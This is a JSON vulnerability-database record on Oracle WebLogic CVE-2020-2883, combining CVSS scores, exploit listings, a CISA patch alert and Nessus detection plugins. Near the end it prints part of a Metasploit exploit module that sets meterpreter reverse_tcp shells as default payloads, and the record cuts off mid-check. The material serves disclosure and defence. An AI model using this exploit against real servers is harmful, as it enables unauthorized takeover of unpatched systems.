{"githubexploit": [{"lastseen": "2022-08-18T14:10:34", "description": "# POC for weblogic CVE-2020-2883\n\npoc1:\n\n```bash\n javax.manageme...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-13T09:56:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2021-11-01T14:05:46", "id": "54F9B4D4-129B-5916-8725-D750A1593FBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:20:31", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2020-05-10T09:04:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-08-17T09:55:08", "id": "80F73667-B6DA-5D40-984F-3F104E58C6B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:16:15", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-19T03:34:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-08-15T01:53:49", "id": "AE10BD2D-66B3-5C55-9296-FA884BA0CA27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:21:46", "description": "# CVE-2020-2883\n```\nre write of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-14T23:12:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-11-03T23:46:48", "id": "80BDF069-A8BA-5707-9BA2-FB1B734ECD49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:00:51", "description": "# what's this\nThis project which based weblogic_cmd is a poc for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-26T14:10:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2021-11-16T11:30:53", "id": "56A5375E-A6AB-5DC6-978E-A0DAE6E46CD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:47:50", "description": "# CVE-2020-14645\n\n## \u4f7f\u7528\u65b9\u6cd5\n\n\u9996\u5148\u4f7f\u7528[NDI-Injection-Exploit](https://g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-20T11:40:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883", "CVE-2020-14645"], "modified": "2021-12-04T16:32:59", "id": "9AA8EF18-C44A-5F96-A520-2C2F431271D2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T18:09:06", "description": "# weblogicPoc\nWeblogic Vuln POC EXP cve-2020-2551 cve-2020-2555...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-16T03:01:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2883"], "modified": "2022-03-30T14:19:43", "id": "94095106-8E25-54E1-924C-2C3B4E99610F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa": [{"lastseen": "2021-02-24T18:06:49", 
"description": "Oracle has released a blog post warning users that a previously disclosed Oracle WebLogic Server remote code execution vulnerability (CVE-2020-2883) is being exploited in the wild. Oracle disclosed the vulnerability and provided software patches in their April 2020 Critical Patch Update; however, malicious cyber actors are now known to be targeting unpatched servers.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators to review the [Oracle Blog](<https://blogs.oracle.com/security/apply-april-2020-cpu>) and the [April 2020 Critical Patch Updates](<https://www.oracle.com/security-alerts/cpuapr2020.html>) for more information and apply the necessary patches as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/unpatched-oracle-weblogic-servers-vulnerable-cve-2020-2883>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "cisa", "title": "Unpatched Oracle WebLogic Servers Vulnerable to CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-05-01T00:00:00", "id": "CISA:CF47526108A633F1CF0306DCCE9154EA", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/unpatched-oracle-weblogic-servers-vulnerable-cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-02-17T14:30:02", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, and 12.2.1.4.0 T3 Access Attack", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-05-18T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "701276.PRM", "href": "https://www.tenable.com/plugins/nnm/701276", "sourceData": "Binary data 701276.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-09T15:12:30", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the WLS Core Components subcomponent due to unsafe deserialization of Java objects. An unauthenticated remote attacker can exploit this, via a crafted serialized Java object, to execute arbitrary commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-02T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Java Object Deserialization RCE (CVE-2020-2883)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2023-03-08T00:00:00", 
"cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE_2020_2883.NBIN", "href": "https://www.tenable.com/plugins/nessus/138074", "sourceData": "Binary data oracle_weblogic_server_cve_2020_2883.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T14:52:31", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the CPUApr2020 advisory.\n\n - A remote code execution vulnerability exists in the Log4j SocketServer class due to unsafe deserialization of untrusted data. An unauthenticated, remote attacker can exploit this to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17. (CVE-2019-17571)\n\n - An information disclosure vulnerability exists in the Console component. An unauthenticated, remote attacker can exploit this to gain unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2020-2766)\n\n - A vulnerability in the WLS Web Services component exists. An authenticated, remote attacker can exploit this via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. 
(CVE-2020-2798)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Apr 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943", "CVE-2019-17359", "CVE-2019-17571", "CVE-2020-2766", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2811", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2867", "CVE-2020-2869", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2963"], "modified": "2023-02-07T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/135680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135680);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2023/02/07\");\n\n script_cve_id(\n \"CVE-2019-16943\",\n \"CVE-2019-17359\",\n \"CVE-2019-17571\",\n \"CVE-2020-2766\",\n \"CVE-2020-2798\",\n \"CVE-2020-2801\",\n \"CVE-2020-2811\",\n \"CVE-2020-2828\",\n \"CVE-2020-2829\",\n \"CVE-2020-2867\",\n \"CVE-2020-2869\",\n \"CVE-2020-2883\",\n \"CVE-2020-2884\",\n \"CVE-2020-2963\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0153\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0045\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Apr 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the CPUApr2020 advisory.\n\n - A remote code execution vulnerability exists in the Log4j SocketServer class due to unsafe deserialization of\n untrusted data. An unauthenticated, remote attacker can exploit this to remotely execute arbitrary code when\n combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j\n versions up to 1.2 up to 1.2.17. (CVE-2019-17571)\n\n - An information disclosure vulnerability exists in the Console component. An unauthenticated, remote attacker can\n exploit this to gain unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2020-2766)\n\n - A vulnerability in the WLS Web Services component exists. An authenticated, remote attacker can exploit this via T3\n to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle\n WebLogic Server. 
(CVE-2020-2798)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuapr2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-2884\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^12\\.2\\.1\\.4($|[^0-9])\")\n{\n fix_ver = '12.2.1.4.200228';\n fix = make_list('30970477', '30761841', '31101341');\n}\n\nelse if (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.200227';\n fix = make_list('30965714');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.200414';\n fix = make_list('30857795');\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = '10.3.6.0.200414';\n fix = make_list('Q3ZB');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-26T01:20:09", "description": "This Metasploit module exploits a Java object deserialization vulnerability in multiple versions of WebLogic. 
Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable versions of WebLogic. Leveraging an ExtractorComparator enables the ability to trigger method.invoke(), which will execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-08T00:00:00", "type": "zdt", "title": "WebLogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-06-08T00:00:00", "id": "1337DAY-ID-34538", "href": "https://0day.today/exploit/description/34538", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WebLogic Server Deserialization 
RCE BadAttributeValueExpException ExtComp',\n 'Description' => %q{\n There exists a Java object deserialization vulnerability\n in multiple versions of WebLogic.\n\n Unauthenticated remote code execution can be achieved by\n sending a serialized `BadAttributeValueExpException`\n object over the T3 protocol to vulnerable versions of\n WebLogic. Leveraging an `ExtractorComparator` enables\n the ability to trigger `method.invoke()`, which will\n execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Quynh Le', # Vulnerability Discovery\n 'Y4er', # PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2020-2883' ],\n [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],\n ],\n 'Platform' => %w[unix linux win],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Unix',\n {\n 'Platform' => %w[unix linux],\n 'CmdStagerFlavor' => 'printf',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n ],\n 'DisclosureDate' => '2020-04-30',\n 'DefaultTarget' => 0\n )\n )\n\n register_options([ Opt::RPORT(7001) ])\n end\n\n def check\n connect\n\n web_req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\nHost: #{peer}\\n\\n\"\n sock.put(web_req)\n sleep(2)\n res = sock.get_once\n\n versions =\n [\n Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'),\n Gem::Version.new('12.2.1.4.0')\n ]\n\n return CheckCode::Unknown('Failed to obtain response from service') unless res\n\n /WebLogic\\s+Server\\s+Version:\\s+(?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*\\.*\\d*)/ =~ res\n return CheckCode::Unknown('Failed to 